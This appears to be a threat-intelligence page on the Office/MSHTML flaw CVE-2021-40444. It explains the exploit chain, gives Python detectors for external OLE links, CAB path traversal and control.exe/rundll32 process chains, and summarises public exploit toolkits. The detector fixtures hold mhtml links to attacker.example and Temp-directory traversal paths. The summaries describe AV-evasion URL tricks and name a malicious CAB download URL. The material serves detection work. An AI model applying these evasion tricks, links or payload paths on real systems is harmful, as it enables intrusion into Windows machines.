Microsoft MSHTML Remote Code Execution Vulnerability
CVE-2021-40444 is a remote code execution vulnerability in MSHTML, the Trident browser rendering engine shipped with Microsoft Windows, that can be triggered through specially crafted Microsoft Office documents. Microsoft stated that an attacker can craft a malicious ActiveX control to be used by an Office document that hosts the browser rendering engine. In the exploitation observed in the wild, the document carried an external oleObject relationship pointing at attacker-controlled MIME HTML (mhtml:) content; the script in that page downloaded a CAB archive containing a DLL disguised as an .inf file, had it unpacked to a predictable location, and launched it through the .cpl URI handler, which is why control.exe and rundll32.exe (Control_RunDLL) appear in the resulting process chain. Microsoft reported that when the document is opened without the Mark of the Web, so that Protected View does not apply, the payload runs as soon as the file is opened, with no user interaction beyond opening it. The vulnerability was exploited in targeted attacks as an initial access vector to deliver follow-on payloads, including custom Cobalt Strike loaders and other malware; Microsoft shipped a fix in its September 2021 security updates.
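The external oleObject relationship described above is the one static indicator that every variant of this document chain shares, so it is worth checking for before a file reaches Office. The following added example (not code from this page or from any of the tooling it lists) opens a .docx as the ZIP package it is, walks every .rels part, and reports oleObject relationships whose target is external or carries a remote scheme. The scheme match is case-insensitive on purpose, because the uppercase "HTTP" and backslash tricks used by some builders leave the scheme prefix intact. The hostname attacker.example and the minimal package the example builds for itself are constructed for the demonstration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# Targets that would make Office hand the link to MSHTML/URLMon instead of a package part.
REMOTE = re.compile(r"^\s*(mhtml:|https?:|ftp:|file:|\\\\)", re.IGNORECASE)


def find_external_ole(docx_bytes):
    """Return (rels part, rId, target) for each oleObject relationship pointing outside the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("Type") != OLE_REL:
                    continue
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" or REMOTE.match(target):
                    hits.append((part, rel.get("Id"), target))
    return hits


# --- constructed sample package (not a real document) ---------------------------------
CONTENT_TYPES = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
<Default Extension="xml" ContentType="application/xml"/>
<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>"""
ROOT_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="%s">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>""" % REL_NS
DOCUMENT_XML = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                '<w:body><w:p/></w:body></w:document>')


def rels(ole_target, external):
    """Build a word/_rels/document.xml.rels part with one oleObject relationship."""
    mode = ' TargetMode="External"' if external else ""
    return f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
<Relationship Id="rId5" Type="{OLE_REL}" Target="{ole_target}"{mode}/>
</Relationships>"""


def build_docx(document_rels):
    """Assemble a minimal .docx in memory so the scanner can be exercised offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", ROOT_RELS)
        z.writestr("word/document.xml", DOCUMENT_XML)
        z.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


# Constructed targets: a normal embedded object, the mhtml shape from the in-the-wild chain,
# and an evasion variant with uppercase scheme and backslashes but no TargetMode attribute.
BENIGN = rels("embeddings/oleObject1.bin", False)
MHTML = rels("mhtml:http://attacker.example/side.html!x-usc:http://attacker.example/side.html", True)
EVASIVE = rels("MHTML:HTTP:\\\\attacker.example\\side.html", False)

if __name__ == "__main__":
    for label, part in (("benign", BENIGN), ("mhtml", MHTML), ("evasive", EVASIVE)):
        print(label, find_external_ole(build_docx(part)))
```

Scanning only oleObject relationships keeps the false-positive rate low: hyperlinks are legitimately External and would otherwise flood the results. Extend `OLE_REL` to a set if you also want to catch external attachedTemplate or frame targets.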
Exploits
8 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (7 hidden).
This repository provides a full builder toolkit for constructing exploits targeting CVE-2021-40444, a critical remote code execution vulnerability reached through Microsoft Office Word documents. The structure includes a set of Python scripts: 'generate_cab.py' creates a malicious CAB archive containing an attacker-supplied DLL; 'generate_html.py' produces an HTML file referencing the CAB file; and 'generate_doc.py' crafts a Word document (.docx) that embeds an external OLE object reference to the attacker's HTML or CAB file. The 'doc' directory contains template Office XML files that are modified by the scripts to include the malicious references. The README provides detailed instructions for using the toolkit, including AV evasion tips (such as using uppercase 'HTTP' and backslashes in URLs). The exploit chain is: (1) attacker prepares a DLL payload, (2) builds a CAB file, (3) hosts the CAB and HTML files, (4) generates a malicious .docx that references the attacker's content, and (5) delivers the document to a victim. When the document is opened, the MSHTML engine hosted by Office loads the attacker's HTML, which fetches the CAB and executes the DLL it contains, resulting in arbitrary code execution. The repository is operational and can be used to generate working exploits for CVE-2021-40444, with customizable payloads and network endpoints.
This repository is a fully weaponized exploit generator for CVE-2021-40444 (Microsoft Office Word Remote Code Execution) and CVE-2022-30190 (Follina, ms-msdt). It contains Python scripts (generator.py, cab_parser.py) to automate the creation of malicious DOCX/RTF files that exploit these vulnerabilities. The generator can embed arbitrary attacker-supplied payloads (DLLs, scripts) and supports multiple exploit chains, including CAB-based, CAB-less (RAR, HTML smuggling), and Follina (ms-msdt) variants. The exploit works by crafting a DOCX/RTF file that references a malicious HTML file, which in turn triggers the download and execution of a payload via ActiveX, CAB path traversal, or the ms-msdt protocol. The repository includes templates for the malicious HTML, test payloads (calc.exe launchers in various scripting languages), and a simple Python web server for hosting the payloads. The exploit is highly customizable and operational, supporting arbitrary code execution on vulnerable Windows systems with Microsoft Office. Notable endpoints include the use of HTTP(S) servers for payload delivery and various file paths in the Windows temp directories for payload drop and execution. The structure is modular, with clear separation between payload generation, file templates, and server hosting.
This repository provides a full proof-of-concept exploit for CVE-2021-40444, a critical remote code execution vulnerability in Microsoft Windows MSHTML (Trident) engine, exploited via malicious Office documents. The structure includes: - A 'maldoc' directory containing the components of a malicious DOCX file, with instructions to modify 'document.xml.rels' to point to a hosted HTML exploit. - 'www/exploit.html' and 'www/deob.html' are the obfuscated and deobfuscated HTML exploit files, respectively. These files use JavaScript and ActiveX to trigger the vulnerability and fetch a malicious CAB file containing a DLL payload. - 'patch_cab.py' and 'deobfuscate.py' are helper scripts for preparing the CAB file and deobfuscating the HTML exploit. - The payload is a DLL (calc.dll) that, when executed, launches calc.exe as a demonstration of code execution. - The README.md provides detailed step-by-step instructions for generating the malicious DOCX, CAB, and setting up the HTTP server to deliver the exploit chain. The exploit chain is as follows: a user opens the crafted DOCX, which loads a remote HTML file (exploit.html) via MSHTML. The HTML triggers the vulnerability, causing the system to fetch and execute a DLL from a CAB file, resulting in arbitrary code execution. The exploit is operational and demonstrates real code execution, but the payload is a simple demonstration (calc.exe).
This repository is a proof-of-concept (PoC) exploit for CVE-2021-40444, a remote code execution vulnerability in the MSHTML engine used by Internet Explorer and by other Windows components that host it, triggered via malicious ActiveX controls. The repository contains two files: a brief README and a 'poc.html' file. The HTML file contains obfuscated JavaScript that creates multiple iframes and ActiveX objects, then attempts to download a CAB file from 'http://localhost/trojan.cab' and load it using a specific ActiveX class ID. The script also manipulates file paths such as 'AppData/Local/Temp/Low/whoiam.inf', inside the low-integrity temp directory used by Internet Explorer Protected Mode, to drop or interact with files on the target system. The PoC is designed to be opened in Internet Explorer 11 on Windows with ActiveX enabled; it demonstrates the attack vector but ships no real payload (the CAB file is referenced on 'localhost'). It is intended for research and demonstration purposes.
This repository is a fully weaponized exploit generator for CVE-2021-40444, a critical Microsoft Office Word Remote Code Execution vulnerability. The exploit leverages a crafted .docx file that references a malicious HTML file, which in turn uses ActiveX and path traversal in a CAB file to drop and execute an attacker-controlled DLL or script via the .cpl URI handler. The repository includes Python scripts (generator.py, cab_parser.py) to automate the creation and patching of malicious CAB files, generate the required DDF files, and serve the payloads via a simple web server (util/server.py). Multiple HTML templates are provided for different obfuscation and delivery strategies, including CAB-less and RAR-based variants. Test payloads (calc.js, calc.vbs, calc.hta, job-jscript.wsf, job-vbs.wsf) demonstrate code execution. The exploit is highly configurable, allowing the attacker to specify the payload, hosting URL, and output format. The structure is modular, with clear separation between payload generation, document crafting, and hosting. This is a mature, weaponized exploit toolkit targeting unpatched Microsoft Office installations on Windows, capable of delivering arbitrary code execution via document-based attack vectors.
This repository contains a single JavaScript file, 'loader.js', which implements a browser-based exploit targeting Internet Explorer on Windows systems. The exploit leverages ActiveX objects and the 'htmlfile' COM object to create a controlled environment, then attempts to download a remote CAB file ('http://hidusi.com/e8c76295a5f9acb7/ministry.cab') and instantiate it via an embedded object element. The script manipulates the DOM and uses various file paths (e.g., 'AppData/Local/Temp/Low/championship.inf') that suggest attempts to drop or interact with files on the victim's system. The exploit is operational and could lead to remote code execution if run in a vulnerable environment. The code is not part of a known exploit framework and is written in JavaScript, designed to be executed in a browser context with ActiveX enabled.
This repository contains a Metasploit module (Microsoft-Office-Word-MSHTML_Exploit.rb) that exploits CVE-2021-40444, a remote code execution vulnerability in Microsoft Office Word's handling of MSHTML (browser rendering engine) via malicious ActiveX controls. The module generates a malicious DOCX file ('msf.docx') that, when opened on a vulnerable Windows system, triggers code execution by loading further payloads from an attacker-controlled HTTP(S) server. The exploit leverages both file format and network attack vectors: the initial infection vector is the crafted DOCX file, and subsequent payloads (HTML, CAB, DLL) are served over HTTP/HTTPS. The module allows for payload customization using Metasploit's payload system, making it weaponized and suitable for red teaming or penetration testing. The repository structure is simple, with the main exploit logic in the Ruby file and a brief README describing its purpose.
The repository 'Caboom' is a C# project designed to generate malicious .cab files for exploiting CVE-2021-40444, a Microsoft MSHTML remote code execution vulnerability. The main logic resides in 'Program.cs', which takes a user-supplied .dll or .inf file, uses CABARC.EXE to package it into a .cab archive, and then modifies specific bytes in the resulting file to create a final payload ('finalPayload.cab'). This crafted .cab file can be used in further exploitation scenarios, such as embedding in Office documents to trigger the vulnerability. The repository includes Visual Studio project files, configuration files, and build artifacts, but the core exploit logic is in 'Program.cs'. The tool is intended for penetration testers and red teamers, as stated in the README, and is not a detection script. No network endpoints are present; the attack vector is local file manipulation for subsequent use in remote attacks.
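The CAB path traversal that several of the entries above rely on lives in the cabinet's CFFILE directory: the stored file name is a relative path, so the extractor writes the DLL outside the directory it was asked to use. The following added example (not code from Caboom or from any other repository listed here) parses that directory straight from the bytes, following the CFHEADER, CFFOLDER and CFFILE layout of the Microsoft Cabinet format, and flags entries whose name escapes the extraction directory. The cabinet it builds for itself is a constructed header-only sample with no CFDATA blocks and no payload; the entry names in it are likewise made up for the demonstration.

```python
import struct

CFHEADER_SIZE = 36   # fixed part of the cabinet header (no optional reserve fields)
CFFOLDER_SIZE = 8    # coffCabStart(4) cCFData(2) typeCompress(2)
CFFILE_FIXED = 16    # cbFile(4) uoffFolderStart(4) iFolder(2) date(2) time(2) attribs(2), then szName


def cab_file_names(cab):
    """Walk the CFFILE directory of a cabinet and return the stored names in order."""
    if cab[:4] != b"MSCF":
        raise ValueError("not a cabinet: missing MSCF signature")
    coff_files = struct.unpack_from("<I", cab, 16)[0]   # absolute offset of the first CFFILE
    c_files = struct.unpack_from("<H", cab, 28)[0]      # number of CFFILE entries
    names, pos = [], coff_files
    for _ in range(c_files):
        end = cab.index(b"\x00", pos + CFFILE_FIXED)    # szName is NUL-terminated
        names.append(cab[pos + CFFILE_FIXED:end].decode("utf-8", errors="replace"))
        pos = end + 1
    return names


def suspicious_cab_entries(cab):
    """Names that would land outside the extraction directory: '..' segments, absolute or drive paths."""
    bad = []
    for name in cab_file_names(cab):
        parts = name.replace("\\", "/").split("/")
        if ".." in parts or name.startswith(("/", "\\")) or ":" in name:
            bad.append(name)
    return bad


def build_cab(names):
    """Constructed sample: a structurally valid CFHEADER + one CFFOLDER + CFFILE entries, no data."""
    files = b"".join(
        struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 0x20) + n.encode("utf-8") + b"\x00" for n in names
    )
    coff_files = CFHEADER_SIZE + CFFOLDER_SIZE
    cb_cabinet = coff_files + len(files)
    header = struct.pack(
        "<4sIIIIIBBHHHHH",
        b"MSCF", 0, cb_cabinet, 0, coff_files, 0,
        3, 1,                 # version 1.3
        1, len(names),        # cFolders, cFiles
        0, 0, 0,              # flags, setID, iCabinet
    )
    folder = struct.pack("<IHH", cb_cabinet, 0, 0)   # no CFDATA blocks, stored (uncompressed)
    return header + folder + files


# Constructed entry names: one traversal into the user's Temp directory, one ordinary file.
SAMPLE_CAB = build_cab(["../../AppData/Local/Temp/msword.inf", "readme.txt"])

if __name__ == "__main__":
    print(cab_file_names(SAMPLE_CAB))
    print(suspicious_cab_entries(SAMPLE_CAB))
```

Because the check reads only the directory, it costs nothing to run on every cabinet crossing a mail or web gateway, and it is unaffected by whatever compression or obfuscation the CFDATA blocks use.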
Recent activity
30 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Microsoft Windows MSHTML (Internet Explorer/Trident) remote code execution vulnerability typically exploited via malicious Office documents that trigger MSHTML to execute attacker-controlled code.
A Microsoft MSHTML remote code execution vulnerability associated here with Microsoft Office spawning control.exe to execute malicious .cpl or .inf files, potentially enabling arbitrary code execution.
A Microsoft MSHTML remote code execution vulnerability exploited via malicious Office documents that can load ActiveX controls and download remote payloads.
A Microsoft MSHTML remote code execution vulnerability that is referenced as potentially linked to malicious rundll32.exe Control_RunDLL execution.
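The control.exe and rundll32.exe Control_RunDLL behaviour these entries refer to is the most portable host-based signal for the chain: an Office process should never launch control.exe, and Control_RunDLL should never be handed an .inf or a traversal path. The following added example (not from any source on this page) encodes that as a rule over process-creation events. The events, their field names and the attacker path are constructed for the example and assume a Sysmon-style schema with parent image, image and command line.

```python
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INF_ARG = re.compile(r"\.inf\b")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def matches_cpl_chain(event):
    """True when the event matches either stage of the Office -> control.exe -> rundll32 chain."""
    parent = _basename(event["parent_image"])
    image = _basename(event["image"])
    cmd = event["command_line"].lower()
    traversal = "..\\" in cmd or "../" in cmd
    # Stage 1: Office resolves the .cpl URI handler and spawns control.exe with the dropped path.
    if image == "control.exe" and parent in OFFICE_PARENTS:
        return True
    # Stage 2: control.exe delegates to rundll32 shell32.dll,Control_RunDLL <path>.
    # A legitimate applet is a .cpl under System32; an .inf or a traversal path is the exploit shape.
    if image == "rundll32.exe" and "control_rundll" in cmd and (INF_ARG.search(cmd) or traversal):
        return True
    return False


def scan_events(events):
    """Return the ids of events the rule fires on, in input order."""
    return [e["id"] for e in events if matches_cpl_chain(e)]


# Constructed events: the two exploit stages, then two benign Control Panel launches.
SAMPLE_EVENTS = [
    {"id": 1,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\control.exe",
     "command_line": r'"C:\Windows\System32\control.exe" "..\..\..\AppData\Local\Temp\Low\side.inf"'},
    {"id": 2,
     "parent_image": r"C:\Windows\System32\control.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r'"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\shell32.dll",Control_RunDLL "..\..\..\AppData\Local\Temp\Low\side.inf"'},
    {"id": 3,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\control.exe",
     "command_line": "control.exe"},
    {"id": 4,
     "parent_image": r"C:\Windows\System32\control.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r'"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\shell32.dll",Control_RunDLL "C:\Windows\System32\ncpa.cpl"'},
]

if __name__ == "__main__":
    print(scan_events(SAMPLE_EVENTS))
```

Keeping the two stages as separate conditions matters in practice: EDR telemetry often records rundll32 with control.exe as its parent and no grandparent, so a rule that insists on seeing WINWORD.EXE above both processes misses the second, more reliable stage.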